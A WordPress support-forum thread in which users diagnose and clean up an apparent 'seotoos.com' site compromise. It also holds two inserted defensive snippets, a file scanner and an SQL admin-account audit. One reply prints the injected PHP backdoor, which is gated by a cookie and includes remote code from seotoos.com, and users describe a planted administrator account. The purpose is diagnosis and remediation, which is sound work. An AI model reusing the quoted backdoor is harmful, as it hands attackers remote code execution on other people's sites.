I can't believe that NO ONE from wordpress has been answering our cries ...
Sidewalklyrics, if the problem is in fact related to changes made to files on your server, as it was for me and saraking, then it's not a Wordpress problem and they can't really do anything about it.
I'm not saying no one will respond--I really have no idea if they will or not. But I wouldn't count on it, especially since a potential solution has been posted.
If there is a reason my fix won't work for you, you should post the reason specifically so that other people consider the problem "open" and keep looking for other solutions. For anyone looking at all the issues on here, I would expect they're more likely to spend time on problems that no one has offered any answers to. If your problem is actually different from mine, or if my solution won't work, that could leave you out in the cold, so make sure you explain your situation.
(This is why, in my first post, I was reluctant to include too many details about my problem, since I didn't want to "unfocus" the original poster's problem. But after it went on for a while I decided to go for it.)
Having said all that, I agree it would be great if someone (a Wordpress person or anyone smart!) could come up with a theory as to what kind of changes to which files *could* solve this problem without a complete restore. Just to satisfy my curiosity and so I could learn something new that might help in different situations.
My hosting provider is Yahoo and they only have a Snapshot Backup option, where files have to be restored from an earlier snapshot one by one. There's no option to restore entire folders. Does anyone have any idea which specific files are problematic and should be restored? Given the large number of blog-related files, it would be incredibly tedious to restore them one by one.
But there is a need to find what was changed to prevent future attacks. Restoring old files means restoring wordpress with the same vulnerability.
Lachmi, it seems to me that the snapshot backup is better for you in this instance. It means Yahoo is only taking backups of files as they change rather than backing up your whole system every day.
This means they should be able to tell you exactly which files changed most recently and only restore those. And if restoring those solves the problem, that will also tell the rest of us which files caused the issue.
The problem is that ALL the blog files are showing the modified date as today (perhaps because I accessed the blog and the admin features?), so that means that all of them have to be restored.
Indeed. If there is a serious vulnerability, it is the responsibility of WP to identify it as quickly as possible and post a workaround or fix. Since they are so proud of still supporting the early versions of their software, they need to live up to that challenge.
I also had the seotoo injection into my index.php file, but that is the only one I can find with any changes. However, there are several files that look suspect to me. Can anyone clarify if these are supposed to exist or not?
wp-content/index.php.gif
wp-conent/themes/classic_old.php.pngg
wp-admin/import/b2_old.php.pngg
Pilt
I see.
You might still be able to make it work, because Yahoo takes snapshots every four hours and keeps them for four weeks. So you could restore the second-newest snapshot, or third-newest, and see which were changed there.
http://help.yahoo.com/l/us/yahoo/smallbusiness/webhosting/backup/backup-06.html
Piltdownman, I have another Wordpress install that has not been compromised and it does not have those files. I'm running 2.2.1. (In my admittedly non-expert opinion, they don't look dangerous to me. The .gif shouldn't be dangerous, and although I haven't seen .pngg files before I'm guessing they're just renamed .png (image) files.)
I would love to see an answer from Wordpress here too.
But if we are all having this problem because someone logged on to our servers and changed the perfectly good software we got from Wordpress, then it's not a Wordpress vulnerability. There are probably dozens of ways someone could create a problem if they have access to your Wordpress files.
Of course your issue may be different from mine and may actually be a Wordpress bug. But if your symptoms are the same as others' on this thread--Saves were working fine for a while and then suddenly not working--it's hard to see how it could be a bug. That's why they often recommend an upgrade for this kind of problem--it gets rid of anything not in their default install, and eliminates the possibility of something you, or I, or a hacker, changed in their working code.
In my case a restore of the backup accomplished a similar thing--got rid of possible unauthorized changes but without me having to go through the pain of an upgrade.
And if there's a vulnerability issue then it's with the server host, not Wordpress.
Quick question: what is the name of the actual database of blog posts and comments and in which folder would it typically be located?
Lachmi -
All that info is in the database, not in any of the folders/directories in your public_html space. The database would have been named by you or whoever set up the site in the first place.
I access mine by using phpMyAdmin, which is available as a WP plugin.
Locked -
As to the semantics of whether it's a bug or a security hole or vulnerability, I don't care. I just know that when hackers find a way in, whether they are doing it manually or via a bot, then the people who designed the software should respond; quickly.
Pilt
I totally understand the "I don't care what you call it, I just need it fixed" idea. I would just add one thing to what you said:
I just know that when hackers find a way in, whether they are doing it manually or via a bot, then the people who designed the software should respond; quickly, if the bug or security hole or vulnerability is their fault.
This is where the semantics actually make a difference, because in this case, it is certainly not a bug, because those of us with the problem had working systems for months. It appears to be that something was changed by someone.
Now the hole or vulnerability that allowed this change could be Wordpress's fault, or it could be a hole in the access to your/my server, which would not be their fault, nor could they do anything about it. And since it's a new problem with an old version of the software, it's just as likely to be an issue with the server access as with Wordpress. (Otherwise Wordpress users would have been having this problem for years. It's also possible that there has recently been a Linux or Apache patch that has allowed some unauthorized access via the server, instead of via Wordpress.)
And, in general, if you expect someone who gave you free software to fix something for you for free, in the timeframe that you find acceptable, you might be doomed to disappointment. Especially when they have already acknowledged that they can't promise that, which is why this forum is here. They neither imply nor promise that they will solve every problem, or solve ANY problem within a particular amount of time.
You need to pay for that kind of service.
That doesn't stop me from agreeing with you that I wish someone would come on here with a better idea than restoring all your files...
OK. I give up :-)
I was able to get my site back up and running. One thing that helped was the advice I found here:
http://www.getrichslowly.org/blog/2008/06/08/patching-the-wordpress-anyresultsnet-hack
This was from a year ago, but it appears that a similar attack disabled my site and caused me problems in posting. It could be the same for others....
I did not find all of the same problems noted in the above post (in particular, the RSS code in the database did not match up, so I left it alone) but a lot of it was similar.
I do think that several of those "supposed" pngs and jpegs were suspect, so I commented them out. I also found a couple of files in my uploads folder (the names started with "up.....") that would not open in Photoshop -- so I figured they were not real jpegs...and I deleted them.
People will have to get into their databases to fix things up, so if you are unsure how to use phpMyAdmin, you should read up. It is a plugin you can download, but I know it can be daunting for less-experienced users...
Hope this helps someone!
Pilt
I don't know if this is allowed on here but I'm a freelancer that works primarily with wordpress. If you don't feel like dealing with the hassle of upgrading, email me and I'll upgrade you for a reasonable rate.
info at klcreativedesign.com
Thanks!
Kristy Lee
I painstakingly restored most of the files to an earlier snapshot captured in Yahoo (web hosting), but it still doesn't work. Does anyone have other suggestions apart from this?
Can anyone from WordPress please step in?
I was recently contacted through elance to solve this problem by (SJDankoSF); have not contacted him yet but I will. I went through your posts and now I am definitely sure all of you got hacked.
@Landykos who posted this code:

```php
<?php if(md5($_COOKIE['12942fc392b445f9'])=="695d55c75600f74e94cdded60b2711d0"){ exit; } ?><?php
/* Short and sweet */
if (isset($_GET['license'])) {
    @include('http://seotoos.com/license.txt');
} else {
    define('WP_USE_THEMES', true);
    if (isset($_GET['license'])) {
        @include('http://seotoos.com/license.txt');
    } else {
        require('./wp-blog-header.php');
    }
}
?>
```

This is a Trojan horse insertion, and probably all of you will find some type of similar code inserted in your files, usually in all index.php, config.php and other files.
@Lockedroomguy you found the same code on your index page, and deleting it didn't solve it because this type of code is usually inserted in more than 5 files.
If it doesn't work after backup restoration, that is because your database is infected as well. Remember that the wp-config.php file contains the DB login/pass. That means the hacker has it as well. Case @lachmi
For the ones that got fixed, restoring will not be the solution if you are using an outdated version and have not changed all of your logins (hosting/fps/DBs). They will insert the Trojan again.
Yahoo does not upgrade older WP versions to the newest one automatically. That has to be done manually.
Take care.
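A triage scan for the indicators described in this thread (the cookie-gated `exit`, the remote `@include`, PHP hidden behind image suffixes, and "images" that are not images), as an added example that is not part of any post. The indicator names, the function names and the sample tree are assumptions made here; the sample files are constructed.

```python
import re, tempfile
from pathlib import Path

# Patterns modelled on the injected index.php quoted in this thread.
REMOTE_INCLUDE = re.compile(rb"(?:include|require)(?:_once)?\s*\(?\s*['\"]https?://", re.I)
COOKIE_GATE = re.compile(rb"md5\s*\(\s*\$_COOKIE\s*\[", re.I)
# Names such as index.php.gif or b2_old.php.pngg: PHP behind an image-like suffix.
DISGUISED = re.compile(r"\.php\.\w+$", re.I)
MAGIC = {".gif": (b"GIF87a", b"GIF89a"), ".png": (b"\x89PNG\r\n\x1a\n",),
         ".jpg": (b"\xff\xd8\xff",), ".jpeg": (b"\xff\xd8\xff",)}

def scan_file(path):
    """Return the names of the indicators that match one file."""
    ext = path.suffix.lower()
    with path.open("rb") as fh:
        data = fh.read(1_000_000)  # the first 1 MB is enough for triage
    hits = []
    if DISGUISED.search(path.name):
        hits.append("php-behind-image-suffix")
    if ext in MAGIC and not data.startswith(MAGIC[ext]):
        hits.append("bad-image-header")  # an "image" no viewer will open
    if ext != ".php" and b"<?php" in data:
        hits.append("php-in-non-php-file")  # e.g. a plugin copy named *.new
    if REMOTE_INCLUDE.search(data):
        hits.append("remote-include")
    if COOKIE_GATE.search(data):
        hits.append("cookie-gate")
    return hits

def scan_tree(root):
    """Walk a WordPress directory; map relative path -> indicators found."""
    root = Path(root)
    found = ((p.relative_to(root).as_posix(), scan_file(p))
             for p in sorted(root.rglob("*")) if p.is_file())
    return {rel: hits for rel, hits in found if hits}

def demo():
    """Scan a small constructed tree (sample files, not real malware)."""
    samples = {
        "index.php": b"<?php if(md5($_COOKIE['k'])=='0'){exit;} @include('http://example.invalid/l.txt');",
        "wp-blog-header.php": b"<?php require('./wp-config.php'); ?>",
        "wp-content/index.php.gif": b"<?php /* placeholder body */ ?>",
        "wp-content/uploads/photo.jpg": b"\xff\xd8\xff\xe0 constructed JPEG header",
    }
    with tempfile.TemporaryDirectory() as tmp:
        for rel, body in samples.items():
            target = Path(tmp, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_bytes(body)
        return scan_tree(tmp)
```

Run `scan_tree()` against a copy of the site's document root; a hit is a reason to compare that file with a clean copy of the same WordPress version, not proof of compromise on its own.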
Maybe my post won't help, but...
Same issue. I have not modified the theme or any file in 2 years.
Just to specify that I have another hosting provider.
I followed the advice at http://www.getrichslowly.org/blog/2008/06/08/patching-the-wordpress-anyresultsnet-hack/
I inspected all the files and database tables/rows as specified, and the only things I found are:
- in wp_users table: nameless user created at 00:00:00 on 0000-00-00. Name: Google. I've deleted it.
- in wp_usermeta table: the corresponding userid had the rows:
  `wp_capabilities a:1:{s:13:"administrator";b:1;}`
  `wp_user_level 10`
  `first_name ...`
  I've deleted it as well.
Then I replaced the index.php file (http://seotoos.com/) with my backup one.
But I still have the same issue (i.e. can't save, edit or publish).
FYI, I've made a search for any file modified around May 2009, and except for the index.php, nothing has been modified.
So, it means that the problem is in my database...
I found the exact same entries in the wp_users and wp_usermeta tables. Apart from deleting these entries, any idea what other tables to fix/repair?
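One way to list every administrator account rather than only the one already spotted, as an added example that is not part of any post: the query joins `wp_users` to `wp_usermeta` on the `wp_capabilities` row quoted above. The in-memory SQLite database, its rows and the `expected_logins` allow-list are constructed for illustration, and the default `wp_` table prefix is assumed.

```python
import sqlite3

# Every account holding the administrator role, found via wp_usermeta
# (default "wp_" table prefix assumed). The same SELECT runs on MySQL.
ADMIN_SQL = """
SELECT u.ID, u.user_login, u.user_registered
FROM wp_users u JOIN wp_usermeta m ON m.user_id = u.ID
WHERE m.meta_key = 'wp_capabilities'
  AND m.meta_value LIKE '%"administrator"%'
ORDER BY u.ID
"""

def audit_admins(conn, expected_logins):
    """Return (ID, login, reasons) for admin accounts that need review."""
    flagged = []
    for uid, login, registered in conn.execute(ADMIN_SQL):
        reasons = []
        if login not in expected_logins:
            reasons.append("unexpected-admin")
        if str(registered).startswith("0000-00-00"):
            reasons.append("zero-registration-date")
        if reasons:
            flagged.append((uid, login, reasons))
    return flagged

def demo():
    """Constructed rows in an in-memory SQLite stand-in for the WordPress DB."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE wp_users (ID INTEGER, user_login TEXT, user_registered TEXT);
        CREATE TABLE wp_usermeta (user_id INTEGER, meta_key TEXT, meta_value TEXT);
        INSERT INTO wp_users VALUES (1, 'admin', '2007-03-01 10:00:00');
        INSERT INTO wp_users VALUES (2, 'author1', '2008-01-15 09:30:00');
        INSERT INTO wp_users VALUES (7, '', '0000-00-00 00:00:00');
        INSERT INTO wp_usermeta VALUES (1, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}');
        INSERT INTO wp_usermeta VALUES (2, 'wp_capabilities', 'a:1:{s:6:"author";b:1;}');
        INSERT INTO wp_usermeta VALUES (7, 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}');
        INSERT INTO wp_usermeta VALUES (7, 'wp_user_level', '10');
    """)
    return audit_admins(conn, expected_logins={"admin"})
```

Any account the audit returns that you did not create should be removed together with all of its `wp_usermeta` rows, and the remaining administrators' passwords changed.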
This is getting serious, folks.
Bleary-eyed from lack of sleep about this problem, I stumbled downstairs for my coffee and checked my email as I did so. A certain "Kathy Bates" berated me for my blog being all screwed up. You have to understand, my blog is fairly obscure, since I am still a fairly obscure YA writer, still pre-famous and pre-rich (as I keep telling my daughter, who wonders when I'll be on TV and buy her the iPhone she wants). I emailed her back saying I was working to resolve the problem and begged for her understanding.
This morning, issue still unresolved, I get a phone call. Kathy Bates on the line. She said that if I didn't get my blog up and running to standard, she would make a special trip to Bali (this is where I live, in Paradise, but we still have our fleas and bugs here).
Look. I started blogging to make friends and fans. Not to attract psychos because my frickin' blog is having some problems.
I and my family are moving to an undisclosed location until this is resolved.
I just discovered the same problem yesterday, have Wordpress hosted by Yahoo small business (who I've also emailed), I can't even change my password or profile!!
Hello, Wordpress people? Even if you would be kind enough to tell us that you don't know what's going on, that would be helpful...
To be fair to WordPress, if this is an upgrade issue (as the parallel thread on the same topic suggests), then it's Yahoo Web Hosting that's at fault in my case. They claim to have an "automatic upgrade" option, yet the "blog manager" section of the site states:
Blog type: WordPress
Version: 2.0.2
When the current version is 2.7.1.
WordPress is FREE software. When you make a request for help here, no-one is being paid to help, or to answer you. Any help you do get here will come from another WordPress user, not anyone from automattic.com or wordpress.com - although the former do offer paid support.
My hosting has restored a backup from one day before the "attack" and now it works fine... but I'm afraid...
Thanks for the clarification, and apologies to all the volunteers at WordPress.
To those of you who are still struggling, you have to also look for any of these pesky "fake" jpeg and png files that are scattered about. Delete them or change their names (if you're afraid you might change one you really need...and you can then rename it back...)
I also altered my personal login info, so that it would be rewritten.
I was changing and chasing down a lot of files, so you'll almost have to go through things folder by folder. Oh, and as I mentioned above, check your Uploads folder (or the one you use for that purpose, if you renamed it) for anything that looks suspicious.
If you use the information at the "getrichslowly" blog (posted above a couple of times) you'll have a start on this. It does demand using phpMyAdmin to access and alter your database. If you don't know what you're doing in there, you may want to find a person who does....
Good luck.
Pilt
I can unlock my doors and return to disclosed locations.
My hosting people graciously solved this problem for me.
It was in the wp-plugins. Don't know which one since I backed up and deleted all the plugin folders from the server, but the blog works fine now. I think it was one of the antispam plugins. Today I backfill the wp-plugins and try them out one by one.
I, too, discovered 5/22 that I could not update my blog. My host is BlueHost, and I also had the "seotoos.com" hack. Turns out that 3 files were hacked on May 18, 2009 @ 4:24PM. My index.php (like everyone else's); then in the plugins folder, both akismet and hello (the "hello dolly" WordPress plugin) both had versions with a ".new" extension. I replaced the index.php with a copy I had from 6/21/2008 on my computer and deleted the akismet.new and hello.new from the plugins folder (in the wp-content folder).
For now, my blog *appears* to be operating OK (until the next hack). In the meantime, I'm going to go back in and change my passwords...
Ahhh... same problem for me. A blog user of mine reported on May 20th that they were being prompted to register so that they could comment. I knew we'd not changed it (only two people have admin capabilities on my blog) so I was a little suspicious.
I come to post a quick update this afternoon and I can't post/edit successfully - did a Google and landed here.
I'm on a very old (2.0.1) version of wordpress and have never updated because... well... never really had to. This is the first time I've ever suffered any problems or lost any functionality.
So, I'll replace the old index php and anything else that has been modified and manually clean the entries from the database.. my question then is... would the latest version (2.7?) have been immune to this inject/attack?
Hello:
I have the same symptoms as all of you.
I did post on May 18th early in the morning, but I can see that there were changes in my files made the same day late in the afternoon (my index.php has the "seotoos" stuff).
My web hosting is Yahoo. I contacted them, and they told me that they do not support WordPress and that I must contact WordPress directly. So I came here and read all this information.
I contacted Yahoo again and told them about the hacker files. Now they are trying to fix the problem; I hope they find a solution.
Thank you for all the posts, very useful.
Blessings
test